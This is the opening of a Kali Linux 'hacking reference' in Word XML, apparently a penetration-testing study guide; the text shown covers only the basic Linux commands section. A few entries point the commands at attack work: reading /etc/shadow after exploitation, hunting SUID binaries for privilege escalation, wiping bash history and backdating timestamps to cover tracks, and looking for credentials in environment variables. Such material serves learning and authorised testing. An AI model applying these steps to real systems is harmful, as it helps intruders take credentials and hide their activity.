check.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-l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 -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Switches to the root user account with a full login environment.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 -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 username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Switches to the specified user account.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 www-data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-i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 login shell as root (full root environment)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 allowed commands for the current user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Running privileged nmap scans that require raw socket access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Checking sudo permissions as a first privilege escalation step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Installing tools or modifying system files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Understanding sudo misconfigurations in CTF and pentesting labs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whoami / id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System Info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Show your current user identity and group memberships.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whoami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the current logged-in username.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whoami
# Output: kali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id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UID, GID, and all groups for the current user. Check for docker, sudo, disk groups which can enable privilege escalation.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id
# Output: uid=1000(kali) gid=1000(kali) groups=1000(kali),27(sudo)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id username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identity information for the specified user.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id www-data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Confirming current user after gaining shell access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Checking group membership for privilege escalation paths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Verifying if running as root (UID=0)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Understanding what a compromised user account can access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uname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System Info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Print system information — kernel version, OS, and architecture.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uname -a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all available system information in one line: kernel, hostname, release, version, machine, and OS.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uname -a
# Output: Linux kali 6.1.0-kali9-amd64 #1 SMP PREEMPT_DYNAMIC x86_64 GNU/Linux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uname -r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only the kernel release version.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uname -r
# Output: 6.1.0-kali9-amd64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uname -m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the machine hardware architecture (x86_64, aarch64, etc.).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uname -m
# Output: x86_64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-a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 all system information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-r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 kernel release version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-m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 machine hardware name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Identifying kernel version for exploit research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Confirming architecture before downloading 32/64-bit payloads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Gathering system info during post-exploitation enumeration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Verifying OS in scripts that behave differently across Linux versions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date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System Info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Display or set the current date and time.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date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the current date and time in the default system format.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date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date +"%Y-%m-%d %H:%M:%S"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date in a custom format. Useful for naming output files.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date +"%Y%m%d_%H%M%S"
# Output: 20240115_143022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nmap -oN scan_$(date +%Y%m%d).txt target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Uses command substitution to include the date in a filename.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nmap 192.168.1.1 -oN scan_$(date +%Y%m%d_%H%M%S).txt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Timestamping scan output files for organization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Adding dates to log entries in scripts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Checking system time to validate certificate times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clear / exit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Shell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Clear the terminal screen and exit the shell.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clear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Clears all text from the terminal window. Keyboard shortcut: Ctrl+L.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clear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exit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Closes the current shell session. Equivalent to pressing Ctrl+D.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exit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exit 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Exits the shell with return code N (0=success, non-zero=error).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exit 0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Cleaning up the terminal view after many commands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Closing SSH sessions cleanly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Exiting nested shells or su sessions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passwd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User Management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Change user passwords.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passwd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Prompts for your current password then allows you to set a new one.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passwd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passwd username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Root can set any user's password without knowing the current one.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passwd kali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passwd -l username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Locks the account so the user cannot log in with a password.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passwd -l tempuser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Lock the user account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Changing default passwords on a new Kali installation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Creating backdoor accounts during post-exploitation practice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Understanding /etc/shadow format for password cracking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Locking accounts for security hardening</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="200" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="22c55e"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Linux Text &amp; File Processing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
          <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>
          <w:left w:val="thick" w:color="22c55e" w:sz="12" w:space="6"/>
          <w:right w:val="none" w:color="FFFFFF" w:sz="0"/>
        </w:pBdr>
        <w:shd w:fill="f3f4f6" w:val="clear"/>
        <w:spacing w:before="0" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="374151"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Powerful text manipulation tools: grep, awk, sed, and more for processing data on the command line.</w:t>
      </w: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grep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Text Search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Search for patterns in text — the most-used text filtering tool in Linux.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grep "pattern"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all lines in the file that contain the pattern.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grep "root" /etc/passwd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grep -i "pattern"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Matches regardless of upper/lower case.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grep -i "password" config.php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grep -r "pattern" /path/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Recursively searches all files in a directory and its subdirectories.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grep -r "DB_PASS" /var/www/html/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grep -n "pattern"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Prefixes each matching line with its line number.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grep -n "error" /var/log/syslog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grep -v "pattern"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lines that do NOT match the pattern — useful for excluding noise.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grep -v "^#" /etc/ssh/sshd_config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grep -E "pattern1|pattern2"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Enables extended regular expressions with |, +, ?, () and other metacharacters.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grep -E "root|admin|sudo" /etc/passwd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command | grep "pattern"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Pipes command output into grep to filter for relevant lines.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nmap -sV 192.168.1.1 | grep "open"
ps aux | grep "apache"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-i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Case-insensitive matching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-r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Recursively search through directories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 line numbers of matching lines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-v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Invert match — print lines that do NOT match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 extended regular expressions (like egrep)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Filtering nmap output to show only open ports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Searching web application files for hardcoded passwords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Extracting log entries matching a specific IP or error code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Finding lines in /etc/passwd or /etc/shadow matching users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Filtering ps output to check if a service is running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awk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Text Processing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Powerful text processing — extract columns, perform calculations, and transform data.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awk '{print $N}'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the Nth field (column) of each line. Fields are split by whitespace by default.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awk '{print $1}' /etc/passwd
ps aux | awk '{print $2}'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awk -F: '{print $1}'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Sets the field separator to a custom character. Here : is used for /etc/passwd.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awk -F: '{print $1,$3}' /etc/passwd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awk '{print NR, $0}'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line number (NR) followed by the full line ($0).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awk '{print NR": "$0}' targets.txt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awk '/pattern/ {print}'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only lines matching the pattern — similar to grep but allows processing.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awk '/open/ {print $1, $3}' nmap_output.txt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awk '{sum += $N} END {print sum}'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Accumulates values from a numeric column and prints the total.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awk '{sum += $5} END {print "Total bytes:", sum}' access.log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awk '{print $NF}'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the last field of each line using NF (number of fields) as the index.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 -la | awk '{print $NF}'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-F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Set the input field separator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Extracting IP addresses from nmap or log output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Parsing /etc/passwd to list usernames and UIDs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Summing file sizes from ls output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Extracting specific fields from CSV data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Filtering and reformatting tool output for further processing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sed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Text Editing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Stream editor — find and replace, delete lines, and transform text non-interactively.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sed 's/old/new/g'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Replaces all occurrences of "old" with "new". The /g flag means global (all occurrences on each line).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cat config.txt | sed 's/localhost/192.168.1.100/g'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sed -i 's/old/new/g'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Replaces text directly in the file without needing to redirect output.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sed -i 's/LHOST=127.0.0.1/LHOST=10.0.0.5/g' payload.conf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sed '/pattern/d'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Deletes all lines that match the pattern.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sed '/^#/d' /etc/ssh/sshd_config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sed -n "N,Mp"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lines N through M only.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sed -n "10,20p" access.log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sed '/^$/d'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Removes all blank lines from a file or stream.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sed '/^$/d' messy_output.txt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sed 'Ns/old/new/'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Applies the substitution only on line number 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sed '5s/admin/kali/' users.txt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-i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Edit file in-place (modifies the file directly)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Suppress default output (only print explicit print commands)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Batch replacing IP addresses or hostnames in config files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Removing comment lines from config files for cleaner reading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Transforming tool output format for reporting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Preprocessing wordlists or data files before use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Automating repetitive text edits in scripts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cut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Text Processing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Extract specific columns or character ranges from text.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cut -d":" -f1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Splits each line by the delimiter and extracts field number 1.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cut -d":" -f1 /etc/passwd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cut -d"," -f1,3,5 data.csv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Extracts fields 1, 3, and 5 from a comma-separated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cut -d"," -f2,4 users.csv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cut -c1-10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Extracts characters 1 through 10 of each line.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cut -c1-15 /etc/passwd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Specify the field delimiter character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-f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Select which field(s) to print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-c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Select by character position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Extracting usernames from /etc/passwd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Pulling specific columns from CSV exports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Extracting IP addresses from colon-separated output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Trimming fixed-width fields from log files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sort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Text Processing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Sort lines of text alphabetically or numerically.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sort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Sorts lines in ascending alphabetical order.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sort usernames.txt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sort -n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Sorts lines by numeric value (not lexicographic — 10 comes after 9, not before).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sort -n ports.txt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sort -r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Reverses the sort order.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sort -rn sizes.txt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sort -u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Sorts and removes duplicate lines in one step.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sort -u wordlist.txt &gt; deduped.txt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sort -k N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Sorts by field (column) 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sort -k 5 -n ls_output.txt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Sort numerically instead of alphabetically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-r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Reverse the sort order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-u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Output only unique lines (remove duplicates)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-k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Sort by key (column number)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Sorting a wordlist alphabetically before merging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Deduplicating a list of IP addresses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Sorting port numbers numerically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Ordering log entries by timestamp or size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uniq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Text Processing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Remove or count duplicate adjacent lines. Always pair with sort first.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sort file | uniq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Sorts then removes duplicate lines.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sort ips.txt | uniq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sort file | uniq -c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Counts how many times each unique line appears.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cat access.log | awk '{print $1}' | sort | uniq -c | sort -rn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sort file | uniq -d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only lines that appear more than once.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sort users.txt | uniq -d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sort file | uniq -u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only lines that appear exactly once.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sort users.txt | uniq -u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-c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Prefix each line with its occurrence count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Only print duplicate lines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-u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Only print unique lines (not duplicated)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Deduplicating lists of IP addresses, hostnames, or usernames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Counting most frequent IP addresses in an access log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Finding unique entries after merging multiple lists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Frequency analysis of tokens in data processing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wc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Text Processing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Count lines, words, and characters in files.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wc -l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Counts the number of lines in a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wc -l /usr/share/wordlists/rockyou.txt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wc -w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Counts the number of words in a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wc -w report.txt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wc -c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Counts the number of bytes (characters).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wc -c payload.bin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command | wc -l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Counts the number of lines in command output — i.e., how many results were returned.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grep "open" nmap.txt | wc -l
ls /etc/*.conf | wc -l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 line count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-w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 word count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-c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 byte count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Checking the size of a wordlist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Counting how many open ports nmap found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Measuring the size of a payload in bytes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Counting matching lines from grep output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tr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Text Processing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Translate or delete characters in a stream of text.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tr 'a-z' 'A-Z'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Translates all lowercase letters to uppercase.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'hello world' | tr 'a-z' 'A-Z'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tr -d 'chars'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Deletes all occurrences of the specified characters.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'h3ll0 w0rld' | tr -d '0-9'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tr -s 'char'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Replaces consecutive repeated characters with a single instance.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'aaabbbccc' | tr -s 'abc'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tr '\n' ' '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Converts a multi-line list into a single space-separated line.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cat ips.txt | tr '\n' ','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Delete specified characters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Squeeze repeated characters into one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Normalizing case in usernames or hostnames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Removing special characters from a file before processing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Converting newline-separated lists to comma-separated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Cleaning up tool output for consistent parsing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tee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Redirection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Read from stdin and write to both stdout and a file simultaneously.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command | tee output.txt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Displays command output in the terminal and simultaneously saves it to a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nmap -sV 192.168.1.1 | tee nmap_scan.txt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command | tee -a output.txt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Appends output to an existing file instead of overwriting it.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nmap -sV 192.168.1.2 | tee -a nmap_scan.txt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command | tee file1.txt file2.txt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Writes output to multiple files simultaneously.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nmap 192.168.1.1 | tee scan.txt /tmp/scan_backup.txt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-a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Append to file rather than overwriting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Logging nmap or other tool output while watching it live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Capturing interactive session output for reporting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Sending output to multiple destinations in a pipeline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xargs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Pipes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Build and execute commands from stdin — pass lists as command arguments.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command | xargs another_command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Takes output of first command and passes it as arguments to the second.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cat targets.txt | xargs nmap -sV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find /path -name "*.tmp" | xargs rm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Combines find and rm to delete multiple files efficiently.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find /tmp -name "*.tmp" | xargs rm -f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cat urls.txt | xargs -P 4 -I{} curl {}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Runs the command with up to 4 parallel processes for speed.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cat ips.txt | xargs -P 10 -I{} ping -c1 {}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xargs -p command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Asks for confirmation before running each command.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cat files.txt | xargs -p rm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Maximum number of parallel processes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-I{}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Replace {} in command with each input item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Prompt before executing each command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Running nmap against a list of IP addresses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Deleting multiple files found by find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Parallel downloading of multiple URLs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Passing grep output as arguments to another tool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diff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File Comparison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Compare two files and show their differences.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diff file1 file2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Shows lines that differ between the two files.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diff original.conf modified.conf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diff -u file1 file2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Shows differences in unified format with context lines. Lines starting with - are removed, + are added.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diff -u before.txt after.txt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diff -w file1 file2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Ignores all whitespace differences.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diff -w config_old.txt config_new.txt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-u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Output in unified format (like git diff)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-w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Ignore all whitespace differences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Comparing a config file before and after modification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Reviewing what changed in a file after an incident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Generating patches for scripts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Comparing nmap scan results from different dates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file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File Analysis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Detect the real file type regardless of file extension.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file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the detected type of the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file suspicious_doc.pdf
file malware_sample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file *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Runs file detection on all files in the current directory.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file /tmp/*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file -b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only the type, without the filename prefix.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file -b payload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-b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Brief mode — do not prepend filename to output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Identifying the real type of a suspicious downloaded file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Checking if a binary is ELF 32-bit or 64-bit before exploitation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Detecting renamed scripts or payloads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CTF challenges involving file type identification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strings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Binary Analysis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Extract printable strings from binary files — quick static analysis.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strings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all sequences of 4+ printable characters found in the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strings malware.exe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strings filename | grep -i "http\|pass\|user\|key"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Extracts strings then filters for security-relevant patterns.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strings binary | grep -iE "http|ftp|password|token|api"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strings -n N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Only shows strings of at least N characters (default is 4).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strings -n 8 firmware.bin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Minimum string length (default: 4)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Quick static analysis of malware samples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Finding hardcoded credentials in binaries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Identifying C2 server URLs in malware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CTF challenges involving binary analysis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xxd / hexdump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Binary Analysis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View files in hexadecimal format — essential for binary analysis.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xxd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Displays the file in hexadecimal with ASCII representation on the right.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xxd /bin/ls | head -20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xxd -l N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Displays only the first N bytes of the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xxd -l 16 suspicious.pdf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xxd -p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Outputs continuous hex string without offset or ASCII. Useful for piping.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xxd -p payload.bin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xxd -r -p hexfile.txt &gt; output.bin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Converts a plain hex string back into binary data.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"4865 6c6c 6f" | xxd -r -p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Limit output to N bytes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Output in plain hex (continuous, no ASCII column)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-r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Reverse mode — convert hex back to binary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Examining magic bytes to identify file types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Inspecting network packets or protocol data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Creating or modifying binary payloads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Analyzing binary files in CTF challenges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base64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Encoding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Encode and decode data in Base64 format.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-n "text" | base64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Encodes the text to Base64. The -n flag suppresses the trailing newline.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-n "admin:password123" | base64
# Output: YWRtaW46cGFzc3dvcmQxMjM=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"encoded" | base64 -d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Decodes a Base64-encoded string.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"YWRtaW46cGFzc3dvcmQxMjM=" | base64 -d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base64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Outputs the entire file as a Base64-encoded string.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base64 payload.bin &gt; payload.b64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base64 -d encoded.b64 &gt; output.bin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Decodes a Base64-encoded file back to binary.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base64 -d payload.b64 &gt; payload.bin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Decode mode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Decoding suspicious base64 blobs in malware analysis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Decoding JWT tokens to read their contents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Encoding payloads for obfuscation in security testing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Transferring binary files over text-only channels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CTF challenges involving encoding/decoding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md5sum / sha256sum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Hashing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Calculate cryptographic checksums to verify file integrity.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md5sum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Outputs the MD5 hash and filename.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md5sum kali-linux.iso
md5sum malware_sample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sha256sum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Outputs the SHA256 hash. More secure than MD5 for integrity verification.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sha256sum payload.bin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sha256sum -c checksums.txt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Reads expected hashes from a file and verifies each listed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sha256sum -c kali-linux.iso.sha256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-n 'text' | sha256sum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Computes the hash of a string rather than a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-n 'password123' | md5sum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-c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Check hashes against a file of expected values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Verifying integrity of downloaded ISO images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Identifying malware samples via hash lookup on VirusTotal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Detecting file tampering on a compromised system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Hashing passwords for comparison in scripts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tar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Archiving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Create and extract archive files — the standard Linux archiving tool.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tar -czf archive.tar.gz directory/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Creates a compressed .tar.gz archive of a directory. Remember: czf = Create Zipped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tar -czf pentest_results.tar.gz ~/reports/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tar -xzf archive.tar.gz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Extracts a .tar.gz archive into the current directory.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tar -xzf tool.tar.gz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tar -tzf archive.tar.gz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Lists all files inside an archive without extracting.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tar -tzf suspicious.tar.gz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tar -xzf archive.tar.gz -C /destination/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Extracts the archive into the specified directory.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tar -xzf tool.tar.gz -C /opt/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tar -xzvf archive.tar.gz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Extracts and prints each filename as it is extracted.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tar -xzvf wordlists.tar.gz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-c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 a new archive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-z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Compress with gzip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-f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Specify the archive filename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-x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Extract files from archive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 (table of) contents of archive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-C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Change to directory before extracting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-v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Verbose — list each file as it is processed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Packaging up pentest output files for transfer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Installing tools distributed as .tar.gz files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Inspecting archive contents before extraction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Backing up and archiving data during engagements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gzip / zip / unzip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Archiving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Compress and decompress files with gzip and zip formats.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gzip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Compresses the file and replaces it with filename.gz.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gzip large_wordlist.txt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gunzip filename.gz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Decompresses a gzipped file, restoring the original.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gunzip rockyou.txt.gz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gzip -k filename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Compresses the file but keeps the original.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gzip -k important_log.txt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zip archive.zip file1 file2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Creates a zip archive containing the specified files.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zip results.zip *.txt *.xml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zip -r archive.zip directory/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Creates a zip archive of an entire directory tree.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zip -r pentest_data.zip ~/reports/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unzip archive.zip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Extracts all files from a zip archive.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unzip wordlists.zip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-k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Keep the original file (do not delete it)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-r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Recursively include directories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Decompressing rockyou.txt.gz to use as a wordlist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Creating zip archives to transfer files to Windows systems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Compressing large log files to save space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Extracting tool packages downloaded from GitHub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wget / curl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Network Transfer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Download files and make HTTP requests from the command line.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wget URL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Downloads a file from the URL to the current directory.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wget https://example.com/file.tar.gz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wget -O filename URL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Downloads and saves the file with a custom name.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wget -O payload.exe https://example.com/tool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curl URL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Makes an HTTP GET request and prints the response body.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curl http://192.168.1.100/login.php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curl -o filename URL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Saves curl output to a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curl -o linpeas.sh https://linpeas.sh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curl -s URL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Silent mode — suppresses progress and error messages. Good for scripting.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IP=$(curl -s ifconfig.me)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curl -X POST -d "param=value" URL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Sends an HTTP POST request with form data.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curl -X POST -d "username=admin&amp;password=test" http://target/login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curl -H "Header: Value" URL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Sends the request with a custom HTTP header.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curl -H "Authorization: Bearer TOKEN" https://api.example.com/data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-O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Write output to the specified filename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-o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Write output to a file instead of stdout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Silent mode — no progress bar or error messages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-X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Specify the HTTP method (GET, POST, PUT, etc.)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Send specified data in a POST request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-H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Pass custom header to server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Downloading LinPEAS, WinPEAS, and other post-exploitation scripts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Interacting with web application APIs during testing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Downloading tools directly to a target machine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Testing web application endpoints for injection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Checking public IP with curl ifconfig.me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nc (netcat)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Network Tools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The "Swiss Army knife" of networking — connect, listen, and transfer data over TCP/UDP.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nc -lvnp PORT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Sets up a listener on the specified port to receive an incoming connection. Used to catch reverse shells.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nc -lvnp 4444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nc HOST PORT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Opens a TCP connection to the specified host and port. Useful for banner grabbing.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nc 192.168.1.100 80
nc 192.168.1.100 22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nc -lvnp PORT &lt; file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Serves a file over the specified port for another machine to receive.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nc -lvnp 9001 &lt; linpeas.sh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nc HOST PORT &gt; file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Connects to the sender and saves the received data to a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nc 192.168.1.5 9001 &gt; linpeas.sh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nc -zv HOST PORT_RANGE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Quick port scan without sending data.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nc -zv 192.168.1.1 1-1000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Listen mode — wait for incoming connections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-v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Verbose output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Skip DNS resolution (numeric IP only)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Specify port number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-z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Zero I/O mode — scan without sending data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Setting up a listener to catch reverse shells from exploited targets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Transferring files between machines without SCP/FTP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Banner grabbing to identify running services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Testing if a port is open and accessible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Creating simple backdoor connections for practice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ssh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Remote Access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Secure Shell — remote login and encrypted tunneling.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ssh user@hostname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Opens an SSH session to the remote host as the specified user.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ssh kali@192.168.1.100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ssh -p PORT user@host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Connects to SSH on a non-standard port (default is 22).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ssh -p 2222 user@192.168.1.100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ssh -i keyfile user@host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Authenticates using a private key file instead of a password.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ssh -i ~/.ssh/id_rsa user@192.168.1.100
ssh -i ctf_key root@10.10.10.5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ssh -L LOCAL_PORT:TARGET_HOST:TARGET_PORT user@JUMP_HOST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Forwards a local port through the SSH server to reach a service behind it. Essential for pivoting.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ssh -L 8080:192.168.10.5:80 user@192.168.1.100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ssh -D PORT user@host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Creates a SOCKS proxy on localhost:PORT that routes all traffic through the SSH server.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ssh -D 1080 user@pivot_host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Connect to specified port (default: 22)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-i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Identity file (private key) to use for authentication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Local port forwarding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 dynamic SOCKS proxy on specified local port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Remote administration of Linux servers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Port forwarding to reach internal services during pivoting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Logging in to CTF machines with private key files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Creating SOCKS proxies for proxychains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Securely transferring files with SCP or SFTP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scp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Remote Access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Secure copy — transfer files over SSH.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scp localfile user@host:/remote/path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Uploads a local file to a remote server.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scp linpeas.sh kali@192.168.1.100:/tmp/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scp user@host:/remote/file /local/path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Downloads a file from a remote server to local.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scp root@10.10.10.5:/etc/shadow ~/loot/shadow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scp -r directory user@host:/path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Transfers an entire directory tree to the remote host.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scp -r ~/reports/ user@192.168.1.100:/home/user/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scp -i keyfile file user@host:/path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Uses a private key for SSH authentication during transfer.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scp -i ~/.ssh/ctf_key exploit.sh root@10.10.10.5:/tmp/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-r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Recursively copy entire directories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-i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Identity (private key) file for authentication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Uploading post-exploitation scripts to a target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Downloading loot files from a compromised machine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Transferring CTF challenge files to your local machine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Backing up configuration files from remote servers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rsync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File Sync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Synchronize files locally or over SSH — only transfers changed files.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rsync -avz source/ destination/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Copies a directory, showing progress, with compression. The trailing slash on source/ is important.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rsync -avz ~/pentest/ ~/pentest_backup/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rsync -avz source/ user@host:/destination/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Synchronizes a local directory to a remote server over SSH.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rsync -avz ~/reports/ kali@192.168.1.100:/home/kali/reports/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rsync -avz --delete source/ destination/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Mirrors the source exactly, removing any files from destination that are not in source.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rsync -avz --delete ~/current_tools/ /backup/tools/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-a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Archive mode — preserves permissions, timestamps, and symbolic links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-v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Verbose output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-z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Compress data during transfer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--delete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Delete files in destination not present in source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Regular backups of pentest data to an external drive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Syncing tool directories between machines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Deploying files to a remote server efficiently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ps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Process Management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List running processes — essential for enumeration and process monitoring.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ps aux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Shows all running processes from all users with PID, CPU%, MEM%, and command.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ps aux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ps aux | grep process_name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Filters ps output to find a specific process.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ps aux | grep apache
ps aux | grep python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ps auxf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Displays processes in a tree format showing parent-child relationships.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ps auxf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 processes from all users (not just current user)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u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User-oriented format showing CPU and memory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x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Include processes without a controlling terminal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 full-format listing with process tree (forest)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Checking which services are running after gaining access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Finding processes running as root or other privileged users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Locating web server, database, or application processes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Monitoring whether an exploit payload is running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top / htop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Process Management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Real-time process and resource monitoring.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top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Opens the interactive process monitor. Press q to quit, k to kill a process, P to sort by CPU.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top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htop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Opens the enhanced interactive process monitor. Use F9 to kill, F6 to sort, q to quit.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htop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top -o %MEM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Opens top sorted by memory usage.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top -o %MEM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-o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Specify the sort field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Monitoring CPU usage during intensive scans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Identifying processes consuming excessive resources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Watching for new processes spawning during exploitation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Checking available memory before running memory-intensive tools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kill / killall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Process Management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Terminate running processes by PID or name.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kill PID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Sends SIGTERM (15) to the process, asking it to terminate gracefully.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kill 1234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kill -9 PID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Sends SIGKILL — immediately terminates the process without cleanup. Use when kill alone fails.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kill -9 5678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killall process_name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Kills all processes with the specified name.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killall firefox
killall python3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kill $(pgrep process_name)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Uses pgrep to find the PID and kills it.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kill $(pgrep -f 'nc -lvnp')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-9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Send SIGKILL — force immediate termination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Stopping a hung process or tool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Terminating a netcat listener after catching a shell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Cleaning up background processes at the end of a session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Force-killing an unresponsive application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jobs / bg / fg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Process Management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Manage background and foreground processes in the terminal.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command &amp;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Starts the command in the background, freeing the terminal for other use.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nmap -sV 192.168.1.0/24 &amp;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jobs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Shows all jobs running or stopped in the current shell session with their job numbers.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jobs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fg %N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Brings background job number N to the foreground.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fg %1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bg %N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Resumes a suspended (Ctrl+Z) job in the background.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bg %2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Ctrl+Z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Suspends the currently running foreground job and returns to the shell prompt.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# Press Ctrl+Z while a command is running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Running a long nmap scan in background while doing other work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Managing multiple concurrent tasks in a single terminal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Suspending and resuming interactive processes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crontab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Scheduling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Schedule recurring tasks — and a key persistence mechanism.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crontab -e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Opens the crontab editor for the current user.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crontab -e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crontab -l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Lists all cron jobs for the current user.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crontab -l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cat /etc/crontab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Reads system-wide cron jobs. Look for scripts writable by non-root users.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cat /etc/crontab
ls -la /etc/cron.d/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*/5 * * * * /path/to/command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Format: minute hour day month weekday command. This example runs every 5 minutes.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0 2 * * * /usr/bin/backup.sh   # Run at 2:00 AM daily
*/5 * * * * /tmp/check.sh      # Run every 5 minutes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Edit the current user's crontab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 current user's cron jobs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Scheduling automated scan jobs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Identifying misconfigured cron jobs for privilege escalation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Setting up persistence on a compromised machine (in lab environments)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Automating log rotation or cleanup tasks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systemctl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Service Management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Manage system services and daemons with systemd.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systemctl status service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Shows the current status, recent logs, and PID of a service.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systemctl status ssh
systemctl status apache2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systemctl start service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Starts the specified service.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systemctl start postgresql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systemctl stop service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Stops the specified service.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systemctl stop apache2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systemctl enable service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Configures the service to start automatically at system boot.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systemctl enable ssh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systemctl list-units --type=service --state=running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Shows all currently active services.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systemctl list-units --type=service --state=running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enable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Enable service to start at boot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Starting the SSH service on Kali for remote access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Starting Metasploit's PostgreSQL database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Enumerating running services during post-exploitation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Enabling services to persist across reboots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df / du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Disk Usage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Check disk space and directory sizes.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df -h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Shows disk space for all mounted filesystems in human-readable format.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df -h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du -sh directory/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Shows the total size of a directory.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du -sh /var/log/
du -sh ~/wordlists/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du -h --max-depth=1 /path | sort -rh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Shows the size of each subdirectory, sorted largest first.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du -h --max-depth=1 / 2&gt;/dev/null | sort -rh | head -20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-h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Human-readable sizes (KB, MB, GB)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Summary — show only the total for each argument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Checking if the disk is full before downloading large wordlists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Finding large directories consuming space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Ensuring enough space for tool installation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Identifying unusually large files during forensics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free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System Info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Display system memory (RAM) usage.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free -h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Displays RAM and swap usage in human-readable format.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free -h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watch -n 1 free -h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Refreshes the memory display every second.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watch -n 1 free -h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-h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Human-readable output (MB/GB)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Checking available RAM before running Metasploit or resource-heavy tools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Monitoring memory usage during exploit development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Identifying low memory conditions causing crashes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lsof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System Info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List open files — and every network connection is a file in Linux.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lsof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Shows all open files by all processes. Usually combined with grep to filter.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lsof | grep deleted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lsof -i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Lists all open network connections (sockets).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lsof -i
lsof -i :80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lsof -i :PORT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Shows which process is listening on the specified port.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lsof -i :443
lsof -i :4444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lsof -p PID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Shows all files opened by a specific process ID.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lsof -p 1234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-i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 network files (connections). Add :PORT to filter by port.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 files opened by the specified PID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Finding which process is listening on a specific port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Detecting suspicious network connections from a compromised process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Investigating what files a suspicious process has open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Finding deleted files that are still held open by processes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netstat / ss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Network Tools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Show network connections, listening ports, and routing tables.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ss -tulpn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Shows all TCP and UDP ports currently listening, with process names and numeric addresses.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ss -tulpn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netstat -tulpn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Legacy equivalent to ss -tulpn. Still present on most systems.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netstat -tulpn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ss -tn state established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Shows all currently established TCP connections.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ss -tn state established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 TCP sockets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-u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 UDP sockets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 only listening sockets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 process using the socket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 numeric addresses (no DNS resolution)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Checking which ports are open on a compromised system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Finding internal services not visible from outside the network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Checking if a bind shell or backdoor is listening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Identifying unexpected outbound connections from a system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ip addr / ifconfig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Network Tools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View and configure network interfaces — find your IP address.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ip addr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Displays all network interfaces with their IP addresses, MAC addresses, and status.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ip addr
# or short form:
ip a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ifconfig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Legacy command to show network interface configuration.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ifconfig eth0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ip route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Displays the system routing table.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ip route
# or:
route -n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ip -4 addr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Filters output to show only IPv4 addresses.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ip -4 addr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-4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 IPv4 addresses only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Finding your Kali machine IP for LHOST in payloads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Identifying network interfaces and their IP ranges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Checking if a VPN interface (tun0) is active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Viewing MAC addresses for network analysis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ping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Network Tools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Test network connectivity to a host.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ping -c 4 host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Sends 4 ICMP packets to the host and shows response time. -c prevents infinite pinging.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ping -c 4 192.168.1.1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ping -i 0.2 -c 10 host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Pings faster than the default 1-second interval.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ping -i 0.2 -c 20 192.168.1.1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for i in {1..254}; do ping -c1 -W1 192.168.1.$i 2&gt;/dev/null | grep "1 received" &amp;&amp; echo "192.168.1.$i is up"; done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Pings all hosts in a /24 subnet to find live hosts (slower than nmap -sn).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for i in {1..254}; do ping -c1 -W1 10.0.0.$i &amp;&gt;/dev/null &amp;&amp; echo "10.0.0.$i UP"; done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-c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Stop after sending N packets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-i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Interval between packets in seconds (default: 1)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Checking if a target host is reachable before scanning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Testing network connectivity after configuring a VPN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Quick host discovery in small networks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Measuring network latency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traceroute / tracepath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Network Tools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Trace the network path to a destination host.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traceroute host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Shows each network hop between your machine and the destination.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traceroute 8.8.8.8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traceroute -T -p 80 host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Uses TCP SYN packets on port 80, which may bypass firewalls that block UDP.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traceroute -T -p 80 192.168.1.1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tracepath host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Similar to traceroute but does not require root privileges.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tracepath 192.168.1.1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 TCP SYN for probes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Destination port to use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Mapping the network path to a target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Identifying network devices between attacker and target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Diagnosing routing issues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Understanding network segmentation during a pentest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nslookup / dig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Network Tools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DNS lookup tools — resolve hostnames and query DNS records.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nslookup hostname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Resolves a hostname to its IP address using the system DNS server.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nslookup example.com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dig hostname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Queries DNS for a hostname. More detailed output than nslookup.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dig example.com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dig hostname TYPE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Queries a specific DNS record type (A, MX, TXT, NS, CNAME, SOA).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dig example.com MX
dig example.com TXT
dig example.com NS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dig -x IP_ADDRESS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Resolves an IP address back to a hostname (PTR record lookup).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dig -x 8.8.8.8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dig axfr @dns_server domain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Attempts a DNS zone transfer to get all DNS records for a domain. Often restricted but worth trying.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dig axfr @ns1.example.com example.com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-x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Reverse lookup — resolve IP to hostname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Resolving target hostnames during reconnaissance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Enumerating MX records to identify mail providers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Attempting DNS zone transfers to discover subdomains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Checking TXT records for SPF, DKIM, and other security configurations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Reverse DNS lookups to identify IP address owners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iptables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Network Tools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Linux firewall rules — control inbound and outbound network traffic.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iptables -L -n -v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Lists all current firewall rules with packet counts, numeric IPs, and verbose output.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iptables -L -n -v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iptables -A INPUT -p tcp --dport PORT -j ACCEPT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Adds a rule to accept incoming TCP connections on the specified port.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iptables -A INPUT -p tcp --dport 4444 -j ACCEPT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iptables -A INPUT -s IP_ADDRESS -j DROP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Drops all incoming packets from the specified IP.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iptables -A INPUT -s 10.0.0.99 -j DROP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iptables -F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Deletes (flushes) all rules in all chains. Resets to open firewall.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iptables -F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 all rules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 numeric IPs and ports (no DNS resolution)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-v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Verbose — show packet and byte counts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-A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Append a rule to the chain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Protocol (tcp, udp, icmp)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--dport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Destination port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-j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Jump to target: ACCEPT, DROP, REJECT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-F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Flush (delete) all rules from all chains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Opening a port to receive a reverse shell during a pentest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Understanding firewall restrictions on a target system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Blocking external access to sensitive services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Redirecting traffic for man-in-the-middle attacks</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="200" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="22c55e"/>
          <w:sz w:val="36"/>
